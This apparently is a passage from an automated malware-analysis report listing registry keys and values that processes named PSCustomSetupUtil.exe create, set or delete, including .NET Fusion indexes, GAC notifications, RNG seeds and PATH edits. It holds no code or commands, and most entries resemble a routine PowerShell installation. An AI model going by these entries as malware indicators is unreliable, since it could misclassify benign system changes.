[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 7B 06 EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 55 83 E0 4B 9C E6 49 71 14 48 0E F8 FC C6 D3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process PSCustomSetupUtil.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 41 1A F5 FA B9 58 73 37 59 F5 27 9B 10 C8 85"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "1C F1 C1 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F F1 A2 86 85 2D 41 E0 4B FD 9A 55 4A E1 73 36"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "48 9D 2F ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process PSCustomSetupUtil.exe:2824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 AB 13 57 5E 75 E4 D2 25 AE 89 FF B4 80 B5 8D"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B8 89 2D F2 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 2E 40 93 98 AC C1 97 80 36 DF 8F 31 AE F0 C0"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "60 50 5C EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 94 4A 69 C9 93 8F 6A C8 55 BA BA 6B 71 51 F5"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "FC 34 03 EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:2800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 77 E9 75 74 BE E7 C1 A6 81 C6 10 F6 AD DF F2"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "64 9F 02 F2 C7 D0 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 2C 3B 04 F4 1E 84 AF BB 1F 11 B6 6D 44 BB AA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "8E 60 53 ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:4064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE CF E7 BB 6B C5 E3 BB 05 CC 98 D2 95 6B BF BC"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "B4 3A 87 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 EB 8E 39 64 1F 48 42 08 64 3D 8F 6E 95 FE E6"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A BA 69 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A D5 A9 2E 0D 32 BD 88 65 CB B4 5F F7 93 25 9F"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "06 CF 4F F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:4092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 2F DB 57 A9 C9 5E 5F 75 DA B5 FA 46 68 C2 52"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "AE C2 AF EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 5F 60 C0 F2 C6 61 FF 7E 5F AE 85 0C 3A 5A D4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "5C 3C 0E ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:2708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 07 BD 62 A8 97 D0 EC B2 A8 C2 56 BB CB 7B CD"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "B4 1B 7D F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSCustomSetupUtil.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 9A 65 7C 05 EC C3 01 A1 BB DF 35 1A F3 6B D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B8 DD A8 CD 8A B8 5D 67 98 11 45 8D 8E 41 FD"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 63 C1 9F CC 26 46 B8 93 B5 AB 80 6F E8 C5 D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 0E 8E 3F 90 86 1F A0 FD 1D 80 20 35 85 49 E0"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "08 06 A8 F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 03 50 48 10 67 06 F9 19 71 9B F3 8C 11 2B B5"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "2E 86 79 ED C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 62 C5 22 B3 57 C9 03 38 EF 1C 2E 17 72 4F E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 69 99 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB ED CD 6B FA CA F6 FB 90 BA 5C 6C 4D 94 EB FA"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 AD DA EB C7 D0 D1 01"
